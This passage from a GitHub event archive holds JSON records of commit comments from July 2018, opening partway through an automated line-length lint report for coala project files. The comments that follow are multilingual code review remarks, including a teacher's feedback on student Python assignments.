longer than allowed. (82 > 80) | _projects/gitmate_gitlab.md | 110 |\n| Line is longer than allowed. (83 > 80) | _projects/gitmate_gitlab.md | 119 |\n| Line is longer than allowed. (84 > 80) | _projects/gitmate_gitlab.md | 126 |\n| Line is longer than allowed. (84 > 80) | _projects/gitmate_gitlab.md | 130 |\n| Line is longer than allowed. (87 > 80) | _projects/gitmate_gitlab.md | 148 |\n| Line is longer than allowed. (82 > 80) | _projects/gitmate_gitlab.md | 156 |\n| Line is longer than allowed. (84 > 80) | _projects/gitmate_gitlab.md | 179 |\n| Line is longer than allowed. (111 > 80) | _projects/implement_metrics_for_coala.md | 4 |\n| Line is longer than allowed. (89 > 80) | _projects/implement_metrics_for_coala.md | 19 |\n| Line is longer than allowed. (113 > 80) | _projects/roberta_external_source.md | 5 |\n| Line is longer than allowed. (116 > 80) | _projects/roberta_external_source.md | 17 |\n| Line is longer than allowed. (113 > 80) | _projects/roberta_external_source.md | 18 |\n| Line is longer than allowed. (99 > 80) | _projects/roberta_external_source.md | 20 |\n| Line is longer than allowed. (81 > 80) | _projects/roberta_external_source.md | 33 |\n| Line is longer than allowed. (94 > 80) | _projects/roberta_external_source.md | 34 |\n| Line is longer than allowed. (83 > 80) | _projects/roberta_external_source.md | 36 |\n| Line is longer than allowed. (88 > 80) | _projects/roberta_external_source.md | 38 |\n| Line is longer than allowed. (83 > 80) | _projects/roberta_external_source.md | 39 |\n| Line is longer than allowed. (93 > 80) | _projects/roberta_external_source.md | 44 |\n| Line is longer than allowed. (82 > 80) | _projects/roberta_external_source.md | 46 |\n| Line is longer than allowed. (82 > 80) | _projects/roberta_external_source.md | 50 |\n| Line is longer than allowed. (84 > 80) | _projects/roberta_external_source.md | 51 |\n| Line is longer than allowed. (81 > 80) | _projects/roberta_external_source.md | 52 |\n| Line is longer than allowed. (81 > 80) | _projects/roberta_external_source.md | 54 |\n| Line is longer than allowed. (114 > 80) | _projects/roberta_external_source.md | 65 |\n| Line is longer than allowed. (116 > 80) | _projects/roberta_external_source.md | 67 |\n| Line is longer than allowed. (106 > 80) | _projects/roberta_external_source.md | 72 |\n| Line is longer than allowed. (117 > 80) | _projects/roberta_external_source.md | 73 |\n| Line is longer than allowed. (119 > 80) | _projects/roberta_external_source.md | 75 |\n| Line is longer than allowed. (85 > 80) | _projects/roberta_external_source.md | 80 |\n| Line is longer than allowed. (116 > 80) | _projects/roberta_external_source.md | 81 |\n| Line is longer than allowed. (119 > 80) | _projects/roberta_external_source.md | 87 |\n| Line is longer than allowed. (114 > 80) | _projects/roberta_external_source.md | 89 |\n| Line is longer than allowed. (110 > 80) | _projects/editor_support.md | 5 |\n| Line is longer than allowed. (113 > 80) | _projects/editor_support.md | 23 |\n| Line is longer than allowed. (96 > 80) | _projects/antlr_v4.md | 18 |\n| Line is longer than allowed. (115 > 80) | _projects/antlr_v4.md | 45 |\n| Line is longer than allowed. (106 > 80) | _projects/documentation_extraction.md | 4 |\n| Line is longer than allowed. (113 > 80) | _projects/documentation_extraction.md | 19 |\n| Line is longer than allowed. (106 > 80) | _projects/documentation_extraction.md | 29 |\n| Line is longer than allowed. (115 > 80) | _projects/documentation_extraction.md | 30 |\n| Line is longer than allowed. (82 > 80) | _projects/documentation_extraction.md | 31 |\n| Line is longer than allowed. (116 > 80) | _projects/documentation_extraction.md | 32 |\n| Line is longer than allowed. (117 > 80) | _projects/documentation_extraction.md | 33 |\n| Line is longer than allowed. (84 > 80) | _projects/documentation_extraction.md | 34 |\n| Line is longer than allowed. (86 > 80) | _projects/documentation_extraction.md | 40 |\n| Line is longer than allowed. (106 > 80) | _projects/documentation_extraction.md | 55 |\n| Line is longer than allowed. (99 > 80) | _projects/documentation_extraction.md | 56 |\n| Line is longer than allowed. (94 > 80) | _projects/documentation_extraction.md | 67 |\n| Line is longer than allowed. (87 > 80) | _projects/documentation_extraction.md | 68 |\n| Line is longer than allowed. (87 > 80) | _projects/documentation_extraction.md | 70 |\n| Line is longer than allowed. (89 > 80) | _projects/documentation_extraction.md | 74 |\n| Line is longer than allowed. (92 > 80) | _projects/documentation_extraction.md | 75 |\n| Line is longer than allowed. (89 > 80) | _projects/documentation_extraction.md | 76 |\n| Line is longer than allowed. (87 > 80) | _projects/vulture.md | 5 |\n| Line is longer than allowed. (107 > 80) | _projects/vulture.md | 18 |\n| Line is longer than allowed. (114 > 80) | _projects/vulture.md | 19 |\n| Line is longer than allowed. (102 > 80) | _projects/vulture.md | 42 |\n| Line is longer than allowed. (100 > 80) | _projects/vulture.md | 93 |\n| Line is longer than allowed. (118 > 80) | _projects/vulture.md | 136 |\n| Line is longer than allowed. (116 > 80) | _projects/use_coala_3.md | 4 |\n| Line is longer than allowed. (84 > 80) | _projects/use_coala_3.md | 21 |\n| Line is longer than allowed. (98 > 80) | _projects/use_coala_3.md | 42 |\n| Line is longer than allowed. (81 > 80) | _projects/use_coala_3.md | 48 |\n| Line is longer than allowed. (82 > 80) | _projects/use_coala_3.md | 49 |\n| Line is longer than allowed. (82 > 80) | _projects/use_coala_3.md | 79 |\n| Line is longer than allowed. (81 > 80) | _projects/use_coala_3.md | 80 |\n| Line is longer than allowed. (84 > 80) | _projects/use_coala_3.md | 81 |\n| Line is longer than allowed. (83 > 80) | _projects/use_coala_3.md | 82 |\n| Line is longer than allowed. (81 > 80) | _projects/use_coala_3.md | 143 |\n| Line is longer than allowed. (104 > 80) | _projects/use_coala_3.md | 148 |\n| Line is longer than allowed. (97 > 80) | _projects/use_coala_3.md | 152 |\n| Line is longer than allowed. (92 > 80) | _projects/use_coala_3.md | 198 |\n| Line is longer than allowed. (93 > 80) | _projects/coala_language_server.md | 20 |\n| Line is longer than allowed. (92 > 80) | _projects/commit-content-checks.md | 27 |\n| Line is longer than allowed. (81 > 80) | _projects/commit-content-checks.md | 30 |\n| Line is longer than allowed. (86 > 80) | _projects/commit-content-checks.md | 32 |\n| Line is longer than allowed. (84 > 80) | _projects/commit-content-checks.md | 33 |\n| Line is longer than allowed. (86 > 80) | _projects/commit-content-checks.md | 36 |\n| Line is longer than allowed. (83 > 80) | _projects/commit-content-checks.md | 39 |\n| Line is longer than allowed. (87 > 80) | _projects/commit-content-checks.md | 42 |\n| Line is longer than allowed. (84 > 80) | _projects/commit-content-checks.md | 43 |\n| Line is longer than allowed. (82 > 80) | _projects/commit-content-checks.md | 46 |\n| Line is longer than allowed. (92 > 80) | _projects/commit-content-checks.md | 51 |\n| Line is longer than allowed. (102 > 80) | _projects/commit-content-checks.md | 54 |\n| Line is longer than allowed. (94 > 80) | _projects/commit-content-checks.md | 55 |\n| Line is longer than allowed. (102 > 80) | _projects/commit-content-checks.md | 57 |\n| Line is longer than allowed. (94 > 80) | _projects/commit-content-checks.md | 60 |\n| Line is longer than allowed. (89 > 80) | _projects/commit-content-checks.md | 62 |\n| Line is longer than allowed. (90 > 80) | _projects/commit-content-checks.md | 65 |\n| Line is longer than allowed. (90 > 80) | _projects/commit-content-checks.md | 66 |\n| Line is longer than allowed. (87 > 80) | _projects/commit-content-checks.md | 70 |\n| Line is longer than allowed. (83 > 80) | _projects/commit-content-checks.md | 71 |\n| Line is longer than allowed. (86 > 80) | _projects/commit-content-checks.md | 74 |\n| Line is longer than allowed. (82 > 80) | _projects/commit-content-checks.md | 75 |\n| Line is longer than allowed. (90 > 80) | _projects/commit-content-checks.md | 82 |\n| Line is longer than allowed. (119 > 80) | _projects/gitmate_plugins.md | 3 |\n| Line is longer than allowed. (114 > 80) | _projects/gitmate_plugins.md | 6 |\n| Line is longer than allowed. (83 > 80) | _projects/gitmate_plugins.md | 36 |\n| Line is longer than allowed. (118 > 80) | _projects/assign_issues.md | 5 |\n| Line is longer than allowed. (94 > 80) | _projects/assign_issues.md | 25 |\n| Line is longer than allowed. (90 > 80) | _projects/assign_issues.md | 26 |\n| Line is longer than allowed. (102 > 80) | _projects/assign_issues.md | 28 |\n| Line is longer than allowed. (97 > 80) | _projects/assign_issues.md | 29 |\n| Line is longer than allowed. (102 > 80) | _projects/assign_issues.md | 32 |\n| Line is longer than allowed. (87 > 80) | _projects/assign_issues.md | 33 |\n| Line is longer than allowed. (100 > 80) | _projects/assign_issues.md | 35 |\n| Line is longer than allowed. (97 > 80) | _projects/assign_issues.md | 36 |\n| Line is longer than allowed. (102 > 80) | _projects/assign_issues.md | 37 |\n| Line is longer than allowed. (119 > 80) | _projects/jetbrains-ide-plugin.md | 5 |\n| Line is longer than allowed. (88 > 80) | _projects/jetbrains-ide-plugin.md | 18 |\n| Line is longer than allowed. (88 > 80) | _projects/jetbrains-ide-plugin.md | 19 |\n| Line is longer than allowed. (86 > 80) | _projects/jetbrains-ide-plugin.md | 37 |\n| Line is longer than allowed. (85 > 80) | _projects/improve_diff_handling.md | 4 |\n| Line is longer than allowed. (118 > 80) | _projects/improve_diff_handling.md | 39 |\n| Line is longer than allowed. (119 > 80) | _projects/improve_diff_handling.md | 52 |\n| Line is longer than allowed. (101 > 80) | _projects/improve_diff_handling.md | 67 |\n| Line is longer than allowed. (83 > 80) | _projects/improve_diff_handling.md | 131 |\n| Line is longer than allowed. (83 > 80) | _projects/improve_diff_handling.md | 132 |\n| Line is longer than allowed. (86 > 80) | _projects/improve_diff_handling.md | 133 |\n| Line is longer than allowed. (88 > 80) | _projects/improve_diff_handling.md | 134 |\n| Line is longer than allowed. (106 > 80) | _projects/improve_diff_handling.md | 143 |\n| Line is longer than allowed. (96 > 80) | _projects/improve_diff_handling.md | 145 |\n| Line is longer than allowed. (100 > 80) | _projects/improve_diff_handling.md | 153 |\n| Line is longer than allowed. (99 > 80) | _projects/use_coala.md | 4 |\n| Line is longer than allowed. (84 > 80) | _projects/use_coala.md | 24 |\n| Line is longer than allowed. (87 > 80) | _projects/use_coala.md | 25 |\n| Line is longer than allowed. (86 > 80) | _projects/use_coala.md | 33 |\n| Line is longer than allowed. (119 > 80) | _projects/use_coala.md | 78 |\n| Line is longer than allowed. (120 > 80) | _projects/use_coala.md | 80 |\n| Line is longer than allowed. (114 > 80) | _projects/use_coala.md | 83 |\n| Line is longer than allowed. (116 > 80) | _projects/use_coala.md | 84 |\n| Line is longer than allowed. (118 > 80) | _projects/use_coala.md | 87 |\n| Line is longer than allowed. (118 > 80) | _projects/use_coala.md | 111 |\n| Line is longer than allowed. (116 > 80) | _projects/use_coala.md | 114 |\n| Line is longer than allowed. (119 > 80) | _projects/use_coala.md | 115 |\n| Line is longer than allowed. (89 > 80) | _projects/use_coala.md | 142 |\n| Line is longer than allowed. (113 > 80) | _projects/use_coala.md | 186 |\n| Line is longer than allowed. (85 > 80) | _projects/use_coala.md | 200 |\n| Line is longer than allowed. (86 > 80) | _projects/use_coala.md | 213 |\n| Line is longer than allowed. (116 > 80) | _projects/use_coala.md | 217 |\n| Line is longer than allowed. (91 > 80) | _projects/use_coala.md | 218 |\n| Line is longer than allowed. (105 > 80) | _projects/use_coala.md | 220 |\n| Line is longer than allowed. (82 > 80) | _projects/use_coala.md | 223 |\n| Line is longer than allowed. (88 > 80) | _projects/use_coala.md | 239 |\n| Line is longer than allowed. (83 > 80) | _projects/use_coala.md | 240 |\n| Line is longer than allowed. (97 > 80) | _projects/use_coala.md | 242 |\n| Line is longer than allowed. (85 > 80) | _projects/use_coala.md | 257 |\n| Line is longer than allowed. (96 > 80) | _projects/use_coala.md | 268 |\n| Line is longer than allowed. (105 > 80) | _projects/use_coala.md | 281 |\n| Line is longer than allowed. (81 > 80) | _projects/use_coala.md | 296 |\n| Line is longer than allowed. (89 > 80) | _projects/use_coala.md | 307 |\n| Line is longer than allowed. (92 > 80) | _projects/use_coala.md | 311 |\n| Line is longer than allowed. (81 > 80) | _projects/use_coala.md | 329 |\n| Line is longer than allowed. (92 > 80) | _projects/use_coala.md | 347 |\n| Line is longer than allowed. (105 > 80) | _projects/use_coala.md | 378 |\n| Line is longer than allowed. (110 > 80) | _projects/use_coala.md | 383 |\n| Line is longer than allowed. (101 > 80) | _projects/use_coala.md | 418 |\n| Line is longer than allowed. (105 > 80) | _projects/use_coala.md | 440 |\n| Line is longer than allowed. (81 > 80) | _projects/use_coala.md | 462 |\n| Line is longer than allowed. (99 > 80) | _projects/use_coala.md | 470 |\n| Line is longer than allowed. (92 > 80) | _projects/use_coala.md | 475 |\n| Line is longer than allowed. (92 > 80) | _projects/use_coala.md | 483 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-22T08:57:34Z"}
{"id":"7999886143","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791691,"position":11,"line":11,"path":"src/components/BigCard/BigCard.jsx","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:57:54Z","updated_at":"2018-07-22T08:57:54Z","author_association":"OWNER","body":"Интересно, можно ли ссылку на фотку положить в `data.json` чтобы не приходилось вычислять путь каждый раз? По сути твое приложение не должно заботиться о таких вещах. Фотка - это данные, они должны приходить извне и приложение из просто отображает."}},"created_at":"2018-07-22T08:57:54Z"}
{"id":"7999886300","type":"CommitCommentEvent","actor":{"login":"knexer"},"repo":{"name":"knexer/SpaceStationIncremental"},"payload":{"comment":{"id":29791692,"position":82,"line":82,"path":"Assets/Scripts/Station.cs","commit_id":"92f65670dd8b389cd4c6482546c5279572a42ca4","created_at":"2018-07-22T08:58:04Z","updated_at":"2018-07-22T08:58:04Z","author_association":"OWNER","body":"Note to self: if project costs contain multiple entries for one resource type, whatever resources of that type already exist will be counted multiple times.  Project costs should perhaps enforce that each resource has at most one entry."}},"created_at":"2018-07-22T08:58:04Z"}
{"id":"7999887573","type":"CommitCommentEvent","actor":{"login":"xiaojipeng"},"repo":{"name":"xiaojipeng/t1"},"payload":{"comment":{"id":29791693,"position":null,"line":null,"path":null,"commit_id":"979c8df1724f177be9b566bbd46ac58009b97481","created_at":"2018-07-22T08:59:14Z","updated_at":"2018-07-22T08:59:14Z","author_association":"OWNER","body":"tom"}},"created_at":"2018-07-22T08:59:14Z"}
{"id":"7999887906","type":"CommitCommentEvent","actor":{"login":"xiaojipeng"},"repo":{"name":"xiaojipeng/t1"},"payload":{"comment":{"id":29791694,"position":null,"line":null,"path":null,"commit_id":"979c8df1724f177be9b566bbd46ac58009b97481","created_at":"2018-07-22T08:59:31Z","updated_at":"2018-07-22T08:59:31Z","author_association":"OWNER","body":"cat"}},"created_at":"2018-07-22T08:59:31Z"}
{"id":"7999888275","type":"CommitCommentEvent","actor":{"login":"xiaojipeng"},"repo":{"name":"xiaojipeng/t1"},"payload":{"comment":{"id":29791695,"position":null,"line":null,"path":null,"commit_id":"979c8df1724f177be9b566bbd46ac58009b97481","created_at":"2018-07-22T08:59:49Z","updated_at":"2018-07-22T08:59:49Z","author_association":"OWNER","body":"hao"}},"created_at":"2018-07-22T08:59:49Z"}
{"id":"7999888313","type":"CommitCommentEvent","actor":{"login":"nagamanikanta1997"},"repo":{"name":"Sri119/checkout"},"payload":{"comment":{"id":29791696,"position":null,"line":null,"path":null,"commit_id":"ae393e22011a24ecd10cc757c4db1dd2bf8acbe9","created_at":"2018-07-22T08:59:51Z","updated_at":"2018-07-22T08:59:51Z","author_association":"COLLABORATOR","body":"hi ra pulihora"}},"created_at":"2018-07-22T08:59:51Z"}
{"id":"7999890677","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29791705,"position":null,"line":null,"path":null,"commit_id":"67a7dc5c9ec1e1d97108fc4f236f9c63e8ab3d96","created_at":"2018-07-22T09:01:31Z","updated_at":"2018-07-22T09:01:31Z","author_association":"OWNER","body":"Just in case, if the browser does not support sync manager, means we will not be able to send the data at a later point of time using syncing. In such a case, we need to send data in real time, and if the network is not present.....do nothing\r\nsendData() is doing the same thing."}},"created_at":"2018-07-22T09:01:31Z"}
{"id":"7999891763","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18019/programming-term2"},"payload":{"comment":{"id":29791706,"position":null,"line":null,"path":null,"commit_id":"810786f6917ecb41161bc4506e37be9819a40d26","created_at":"2018-07-22T09:02:22Z","updated_at":"2018-07-22T09:02:22Z","author_association":"NONE","body":"要件を満たしていて機能面も過不足ないコードですね。\r\nelifで注文を終了しているあたりが見やすくて好きです。\r\n「他に」を表示するためにループが3つになっているのがちょっと冗長化してしまっている気がしなくもないですが、大きな問題ではないと思います。"}},"created_at":"2018-07-22T09:02:22Z"}
{"id":"7999892017","type":"CommitCommentEvent","actor":{"login":"Chidhambararajan"},"repo":{"name":"Chidhambararajan/Google_vision_api_key_powered"},"payload":{"comment":{"id":29791708,"position":4,"line":81,"path":"Google_vision.py","commit_id":"6977de480c508ed3ca4c0e02f88d9361a1c0c1d6","created_at":"2018-07-22T09:02:35Z","updated_at":"2018-07-22T09:02:35Z","author_association":"OWNER","body":"removed api key"}},"created_at":"2018-07-22T09:02:35Z"}
{"id":"7999892063","type":"CommitCommentEvent","actor":{"login":"thefantas"},"repo":{"name":"tonytomov/jqGrid"},"payload":{"comment":{"id":29791709,"position":null,"line":null,"path":null,"commit_id":"ad71303535c0662ba31bb5f507a26d9d9b6ba8bc","created_at":"2018-07-22T09:02:38Z","updated_at":"2018-07-22T09:02:38Z","author_association":"NONE","body":"This fix brings me a lot of problems when I activate inlineNav and bindKeys, click on add then click on the other inputs and the focus is lost, but if I comment on this \"FIX\" it works very well.\r\nConclusion, they fixed one problem but generated another.\r\n\r\n[](http://jsfiddle.net/5otf826j/19/)\r\n\r\nI will listen to your comments."}},"created_at":"2018-07-22T09:02:38Z"}
{"id":"7999893776","type":"CommitCommentEvent","actor":{"login":"xiaojipeng"},"repo":{"name":"xiaojipeng/t1"},"payload":{"comment":{"id":29791713,"position":null,"line":null,"path":null,"commit_id":"979c8df1724f177be9b566bbd46ac58009b97481","created_at":"2018-07-22T09:04:02Z","updated_at":"2018-07-22T09:04:02Z","author_association":"OWNER","body":"dw"}},"created_at":"2018-07-22T09:04:02Z"}
{"id":"7999894132","type":"CommitCommentEvent","actor":{"login":"SimenB"},"repo":{"name":"facebook/jest"},"payload":{"comment":{"id":29791714,"position":3,"line":3,"path":"website/publish-gh-pages.js","commit_id":"a10bc90cc39f7b8944d850bdc9913b1090095b87","created_at":"2018-07-22T09:04:20Z","updated_at":"2018-07-22T09:04:20Z","author_association":"COLLABORATOR","body":"Do we still use shelljs now?"}},"created_at":"2018-07-22T09:04:20Z"}
{"id":"7999897374","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18020/programming-term2"},"payload":{"comment":{"id":29791720,"position":null,"line":null,"path":null,"commit_id":"784d4c69cf5efd0c5832ffa7f4787e1b480d6555","created_at":"2018-07-22T09:07:06Z","updated_at":"2018-07-22T09:07:06Z","author_association":"NONE","body":"まず課題と関係ない部分ですが、時計直した結果、逆にちょっと時間が遅れちゃってるかも?\r\n水曜日の講義でやったもののコミット時刻が水曜日の講義前になってます。時間が合ってるかちょっとチェックしてみてください。\r\n\r\n課題ですが、かなりいい所まで行ってますが、まだメインメニューのキャンセルと、オプションの「0個以上繰り返し注文」「何も入力せずエンター、またはqで終了」が出来ていないようですね。\r\n余裕があれば修正してみてください。"}},"created_at":"2018-07-22T09:07:06Z"}
{"id":"7999899450","type":"CommitCommentEvent","actor":{"login":"soulomoon"},"repo":{"name":"acidanthera/WhateverGreen"},"payload":{"comment":{"id":29791724,"position":null,"line":null,"path":null,"commit_id":"dd5bc7d6cf8b8482cc5477f2c0d422884f5acea2","created_at":"2018-07-22T09:08:47Z","updated_at":"2018-07-22T09:08:47Z","author_association":"NONE","body":"hdmi is down switching to WhateverGreen from NvidiaGraphicsFixup"}},"created_at":"2018-07-22T09:08:47Z"}
{"id":"7999900459","type":"CommitCommentEvent","actor":{"login":"jameyboor"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29791726,"position":null,"line":null,"path":null,"commit_id":"bdbdc8030ac75f530595377a8c8fc044e36d975e","created_at":"2018-07-22T09:09:42Z","updated_at":"2018-07-22T09:09:42Z","author_association":"NONE","body":"How does this stuff even get through review?\r\n`EntryCheck` has a parameter that's not being used whatsoever & more severely it has undefined behavior because it does not return anything anywhere while it should return a `uint32`. This is exactly how crashes are born."}},"created_at":"2018-07-22T09:09:42Z"}
{"id":"7999901803","type":"CommitCommentEvent","actor":{"login":"wroldwiedbwe"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":29791727,"position":null,"line":null,"path":null,"commit_id":"4211dbf9f51ab106de5a11f3b52aa82aa955c3d4","created_at":"2018-07-22T09:10:49Z","updated_at":"2018-07-22T09:10:49Z","author_association":"NONE","body":"@espenberg Did you mean to do this? Was the intention to only add your translated Finnish file?"}},"created_at":"2018-07-22T09:10:49Z"}
{"id":"7999903584","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29791730,"position":null,"line":null,"path":null,"commit_id":"005f9693e9eec60a9cc34f5a84de82604bcf7fa5","created_at":"2018-07-22T09:12:21Z","updated_at":"2018-07-22T09:12:21Z","author_association":"NONE","body":"@snicolet, this is non functional, do you really need LTC?"}},"created_at":"2018-07-22T09:12:21Z"}
{"id":"7999904005","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29791731,"position":null,"line":null,"path":null,"commit_id":"ad6b3248a27c50efb70ddcf06f95201408fe12cf","created_at":"2018-07-22T09:12:43Z","updated_at":"2018-07-22T09:12:43Z","author_association":"OWNER","body":"Thx"}},"created_at":"2018-07-22T09:12:43Z"}
{"id":"7999904395","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18021/programming-term2"},"payload":{"comment":{"id":29791733,"position":null,"line":null,"path":null,"commit_id":"f128fa1db82f65a021900d12636f6382c7299588","created_at":"2018-07-22T09:13:03Z","updated_at":"2018-07-22T09:13:03Z","author_association":"NONE","body":"えっと、現状意図している部分と違い、「メインメニューを全て表示する」だけの結果になっているようですね。\r\n\r\nまず選択したメインメニューの値段を表示する部分から実装しましょう。\r\n現状、入力したメインメニューを変数xに代入しているようですね。\r\nこれがmain_maneに存在するかどうかは\r\nx in main_mane\r\nとなります。\r\nこれがTrueであれば存在していて、Falseであれば存在しない状態です。特にforは必要ありません。\r\n\r\n辞書型でやったことを一度テキストをよく読んで振り返り、出来る部分から確実にやるといいと思います。\r\n時間あれば木曜日まで修正してみてくださいね。余裕があれば火・水担当の許田先生に質問してもいいと思います。"}},"created_at":"2018-07-22T09:13:03Z"}
{"id":"7999904763","type":"CommitCommentEvent","actor":{"login":"SuperDroidBond"},"repo":{"name":"AICP/frameworks_base"},"payload":{"comment":{"id":29791735,"position":67,"line":67,"path":"packages/SystemUI/src/com/android/systemui/qs/tiles/OnTheGoTile.java","commit_id":"4d486d34ed6cc460aa47163f26a6f4d986ce301e","created_at":"2018-07-22T09:13:23Z","updated_at":"2018-07-22T09:13:23Z","author_association":"NONE","body":"Why not add a longclick pointing to handle click-\r\n    @Override\r\n    public void handleLongClick() {\r\n        handleClick();\r\n    }\r\n\r\nor else long click on OTG tile will FC systemUI. Please correct me if I am wrong."}},"created_at":"2018-07-22T09:13:23Z"}
{"id":"7999904919","type":"CommitCommentEvent","actor":{"login":"153957"},"repo":{"name":"HiSPARC/publicdb"},"payload":{"comment":{"id":29791736,"position":null,"line":null,"path":null,"commit_id":"219adda4059fa9a29e9c1fa5051cde128f514f81","created_at":"2018-07-22T09:13:34Z","updated_at":"2018-07-22T09:13:34Z","author_association":"MEMBER","body":"Wat denken jullie (@davidfokkema @tomkooij @kaspervd) van deze aanpassing?\r\n\r\nHet wordt nu niet gebruikt, geen station heeft die Nagios service aan staan. We zouden het meer kunnen gebruiken nu meer van de status van een station op data gebaseerd wordt, maar ook dan zou ik zeggen dat de fit routines in SAPPHiRE moeten (https://github.com/HiSPARC/sapphire/issues/32) en dat het model nu niet handig is opgezet. We zouden eenvoudig de MPV die uit data processing komt kunnen ergens opslaan, nu matcht dat namelijk ook niet, wat ook vreemd is."}},"created_at":"2018-07-22T09:13:34Z"}
{"id":"7999908821","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29791747,"position":null,"line":null,"path":null,"commit_id":"60cb6c7d4615ca3143a93a8ffe5f1eb466942735","created_at":"2018-07-22T09:16:54Z","updated_at":"2018-07-22T09:16:54Z","author_association":"OWNER","body":"Sorry Stefan, I was interrupted in my process..."}},"created_at":"2018-07-22T09:16:54Z"}
{"id":"7999909942","type":"CommitCommentEvent","actor":{"login":"espenberg"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":29791749,"position":null,"line":null,"path":null,"commit_id":"4211dbf9f51ab106de5a11f3b52aa82aa955c3d4","created_at":"2018-07-22T09:17:52Z","updated_at":"2018-07-22T09:17:52Z","author_association":"CONTRIBUTOR","body":"Hm...I did a git pull and then git push to upload my Norwegian translation. During the \"pull\" I noticed download of e.g. fi.po amongst others. Did I break something?"}},"created_at":"2018-07-22T09:17:52Z"}
{"id":"7999910959","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/puppet"},"payload":{"comment":{"id":29791751,"position":null,"line":null,"path":null,"commit_id":"c13d3e865e4454098c14e4ef08b1103823acd3f8","created_at":"2018-07-22T09:18:50Z","updated_at":"2018-07-22T09:18:50Z","author_association":"MEMBER","body":"Changing the config here won’t change it in bacula, esp if you’ve already ran a backup job for the pools."}},"created_at":"2018-07-22T09:18:50Z"}
{"id":"7999925950","type":"CommitCommentEvent","actor":{"login":"Robertc8"},"repo":{"name":"Robertc8/robertc8"},"payload":{"comment":{"id":29791775,"position":1,"line":1,"path":".gitignore","commit_id":"499ddfcf9088609401bd37d375779d8a8750773c","created_at":"2018-07-22T09:31:54Z","updated_at":"2018-07-22T09:31:54Z","author_association":"OWNER","body":"Top344"}},"created_at":"2018-07-22T09:31:54Z"}
{"id":"7999927580","type":"CommitCommentEvent","actor":{"login":"kettanaito"},"repo":{"name":"Vidlec/Monitor"},"payload":{"comment":{"id":29791777,"position":6,"line":6,"path":"config/server/config.js","commit_id":"4ec7687dd22f93ff566d26bde0e4c8a2a6348c4c","created_at":"2018-07-22T09:33:20Z","updated_at":"2018-07-22T09:33:20Z","author_association":"COLLABORATOR","body":"Prefer singular for object keys, and plural for arrays.\r\n\r\n```js\r\n{\r\n  gateway: {\r\n    gatewayA: 'foo',\r\n    gatewayB: 'bar'\r\n  }\r\n}\r\n```\r\n\r\n```js\r\n{\r\n  gateways: [\r\n    gatewayA,\r\n    gatewayB\r\n  ]\r\n}\r\n```\r\n\r\nObject value implies **unique** keys. Therefore plurality contradicts the idea of having a reference based on the unique key: `config.gateways.foo`. Whereas singular key behaves as a descriptor to the referenced value: `config.gateway.myGateway`.\r\n\r\nOf course, this is subjective, but I think details like this make the implementation better on a micro-grammar level ;)"}},"created_at":"2018-07-22T09:33:20Z"}
{"id":"7999928701","type":"CommitCommentEvent","actor":{"login":"Robertc8"},"repo":{"name":"Robertc8/robertc8"},"payload":{"comment":{"id":29791778,"position":54,"line":54,"path":".gitignore","commit_id":"499ddfcf9088609401bd37d375779d8a8750773c","created_at":"2018-07-22T09:34:20Z","updated_at":"2018-07-22T09:34:20Z","author_association":"OWNER","body":"Heavyr.com\r\n"}},"created_at":"2018-07-22T09:34:20Z"}
{"id":"7999932890","type":"CommitCommentEvent","actor":{"login":"GuillermoHazebrouck"},"repo":{"name":"OpenVOGEL/OpenVOGEL"},"payload":{"comment":{"id":29791782,"position":null,"line":null,"path":null,"commit_id":"c7df91e79d93c46a9ac25b6f94423bae38c5e192","created_at":"2018-07-22T09:38:09Z","updated_at":"2018-07-22T09:38:09Z","author_association":"COLLABORATOR","body":"Note: this change set relates to #14"}},"created_at":"2018-07-22T09:38:09Z"}
{"id":"7999936121","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18027/programming-term2"},"payload":{"comment":{"id":29791789,"position":null,"line":null,"path":null,"commit_id":"8601370a4aea1ddb3d52806b1bd20ebebb8a9c92","created_at":"2018-07-22T09:40:56Z","updated_at":"2018-07-22T09:40:56Z","author_association":"NONE","body":"本題の前に変数の付け方の話を。\r\n\"staba\",\"staba2\"という変数はその名前から「何をしたくて設けた変数か」が捉えづらいので、あんまり良くないと思います。\r\n例えば仮に目的が「メインメニューが注文されたか」「オプションメニューが注文されたか」であれば、\"is_main_ordered\",\"is_option_ordered\"といった名前にすると良いと思います。\r\n\r\n本題のコードの部分ですが、恐らく29行目でメインメニューが正しく注文されたかを判断しようとしていると思いますが、それを定義した辞書型menuが出てこないので、これではちゃんと判断できないですね。\r\n(含まれているかどうか調べたいキー名) in (辞書型)\r\nでチェックできます。\r\n\r\nまた、pythonはインデントが重要と再三言っています。34行目のstaba2 = Trueが行頭にコーディングされているのは絶対ダメです。\r\nコードを見る限りでは29行目の条件に当てはまる状態にて使いたい変数のようなので、インデントレベルを前後の行に合わせるべきでしょう。"}},"created_at":"2018-07-22T09:40:56Z"}
